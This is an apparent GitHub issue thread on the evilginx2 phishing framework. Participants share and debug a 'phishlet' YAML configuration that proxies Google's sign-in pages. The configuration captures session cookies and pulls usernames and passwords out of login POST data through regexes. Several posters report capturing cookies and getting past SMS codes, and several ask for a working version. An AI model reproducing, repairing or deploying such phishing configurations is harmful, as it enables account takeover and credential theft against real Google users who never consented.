evilginx2 icon indicating copy to clipboard operation
evilginx2 copied to clipboard

Published 20 hours ago verified publisher icon kgretzky

gsuite

Open Ineed2p247 opened this issue 2 years ago • 31 comments

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Screenshot 2022-09-09 230107

Gsuite phishlets does not capture mail/pass, only Cookies. what am i missing please advise.

Ineed2p247 avatar Sep 09 '22 15:09 Ineed2p247

What Gsuite Phishlets Are You Using?

sebastiangonzalezbotasi avatar Sep 17 '22 14:09 sebastiangonzalezbotasi

it is because of the v3 upgrade by google.

ssl-user-en avatar Sep 19 '22 07:09 ssl-user-en

@ssl-user-en can you share your google.yaml for study?

globally0x avatar Sep 19 '22 07:09 globally0x

@Ineed2p247 can you share your Gsuite Phishlets?

globally0x avatar Sep 19 '22 07:09 globally0x

@globally0x

author: '@ineed2p247' min_ver: '2.3.0'

proxy_hosts:

  • {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,}
  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
  • {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true}
  • {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false}

sub_filters:

  • {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  • {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']}

auth_tokens:

  • domain: '.google.com' keys: [".*,regexp"]
  • domain: 'accounts.google.com' keys: [".*,regexp"]
  • domain: 'accounts.google.bg' keys: [".*,regexp"]
  • domain: 'myaccount.google.com' keys: [".*,regexp"]
  • domain: 'mail.google.com' keys: [".*,regexp"]

credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

  • '/CheckCookie'
  • '/_/AccountSettingsUi/browserinfo'

login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

  • path: '/_/signin/sl/challenge' search:
    • {key: 'f.req', search: '.*'}
    • {key: 'continue', search: '.*'} force:
    • {key: 'continue', value: ''} type: 'post'``

Ineed2p247 avatar Sep 19 '22 10:09 Ineed2p247

@ssl-user-en What's the new regex to grab the password?

Ineed2p247 avatar Sep 19 '22 10:09 Ineed2p247

@Ineed2p247 Thanks a lot, I will test now!

globally0x avatar Sep 19 '22 12:09 globally0x

@Ineed2p247 cookie catched. Great work!

globally0x avatar Sep 19 '22 12:09 globally0x

@globally0x What's the new regex to grab the password?

Ineed2p247 avatar Sep 19 '22 16:09 Ineed2p247

@globally0x What's the new regex to grab the password?

'null,[\"([^"]*)\",'

globally0x avatar Sep 20 '22 00:09 globally0x

'null,[\"([^"]*)\",' Test good in chrome windows. It can not use to capture username & password in android.

globally0x avatar Sep 20 '22 00:09 globally0x

Hello Has it happened to you when using google phishlets that after adding users, password and receiving a second validation (code to the cell phone) after clicking on "next" it shows you this?

Captura de pantalla 2022-09-21 a la(s) 20 58 25

sebastiangonzalezbotasi avatar Sep 22 '22 00:09 sebastiangonzalezbotasi

@Ineed2p247 could you share full code of your phishlet pls also I'm getting "error on line 7"

about20kg avatar Sep 23 '22 15:09 about20kg

@globally0x What's the new regex to grab the password?

'null,["([^"]*)",'

the main issue is it's not getting user n pass and this code shows an error during importation. Does anyone have the idea of the correct details for getting the user n pass?

lhost25 avatar Sep 26 '22 01:09 lhost25

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

globally0x avatar Sep 28 '22 12:09 globally0x

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

thanks, sir for the details but i keep getting this error message after those credentials

Screenshot 2022-09-29 at 12 57 51 AM

lhost25 avatar Sep 29 '22 00:09 lhost25

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

Kevin3-00 avatar Sep 29 '22 20:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you getting?

joemorning2 avatar Sep 30 '22 07:09 joemorning2

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you getting?

It means you can't load that phishlets to other phishlets folder

Kevin3-00 avatar Sep 30 '22 15:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you getting?

It means you can load that phishlets to other phishlets folder

Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride.

joemorning2 avatar Sep 30 '22 15:09 joemorning2

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you getting?

It means you can load that phishlets to other phishlets folder

Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride. author: '@Ineed2p247' min_ver: '2.3.0'

proxy_hosts:

{phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true} {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false} sub_filters:

{triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']} auth_tokens:

domain: '.google.com' keys: [".,regexp"] domain: 'accounts.google.com' keys: [".,regexp"] domain: 'accounts.google.bg' keys: [".,regexp"] domain: 'myaccount.google.com' keys: [".,regexp"] domain: 'mail.google.com' keys: [".*,regexp"] credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

'/CheckCookie' '/_/AccountSettingsUi/browserinfo' login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

path: '/_/signin/sl/challenge' search: {key: 'f.req', search: '.'} {key: 'continue', search: '.'} force: {key: 'continue', value: ''} type: 'post'``

Take a look at this phishlets after making corrections based on @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post' When you upload it it will get uploaded and will show you there's a problem on line 7 which is what you are seen in the photo.

Kevin3-00 avatar Sep 30 '22 16:09 Kevin3-00

  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}

{phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} This line has problem on the phishlets.

Kevin3-00 avatar Sep 30 '22 16:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you getting?

It means you can load that phishlets to other phishlets folder

Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride. https://github.com/joemorning2

image Seriously?you joined gith just yesterday and your first post would be to hide as some expert on evilginx or i guess you were here before with different i.d and got blocked.Before accusing me of being prideful learn first,since I showed you what the problem was you returned to your shell and hide isn't it?Give me a break and allow people with know how to contribute

Kevin3-00 avatar Sep 30 '22 17:09 Kevin3-00

Who has a working Google phishlet

rhks avatar Oct 01 '22 19:10 rhks

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

This doesn't seem to work

rhks avatar Oct 01 '22 19:10 rhks

@rhks yes it's not working

Ineed2p247 avatar Oct 01 '22 20:10 Ineed2p247

Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment

Ineed2p247 avatar Oct 01 '22 20:10 Ineed2p247

Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment

Please I can we also make it work presently is not capturing username but pass and cookies

Kevin3-00 avatar Oct 01 '22 21:10 Kevin3-00

Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment

Do you mind sharing your working phishlet

rhks avatar Oct 02 '22 16:10 rhks

Estas usando la configuración predeterminada y ya esas no sirven, debes hacer los cambios y adecuarlas. Búscame en Telegram cryptopro99

He is ripper. Don't trust him. He ask you 100$ then after he block you.

ProfessorRS avatar Oct 03 '22 21:10 ProfessorRS

Hello everyone, I'm having a problem that I'm not understanding well what can happen. I am using this version of phishets. Running the program in localhost mode works very well all three steps: a) user b) password c) code by sms d) cookie capture The problem occurs when I run the program in real mode on a server. Although I go through the steps of users, password and code by sms; in the last accept it throws the following error:

Captura de pantalla 2022-10-12 a la(s) 20 01 07

sebastiangonzalezbotasi avatar Oct 12 '22 23:10 sebastiangonzalezbotasi

Hello! If you were already able to resolve your doubts and achieve your goals, close the issue so that we know which ones are pending.

Thank you!

Support-1535 avatar Oct 26 '22 22:10 Support-1535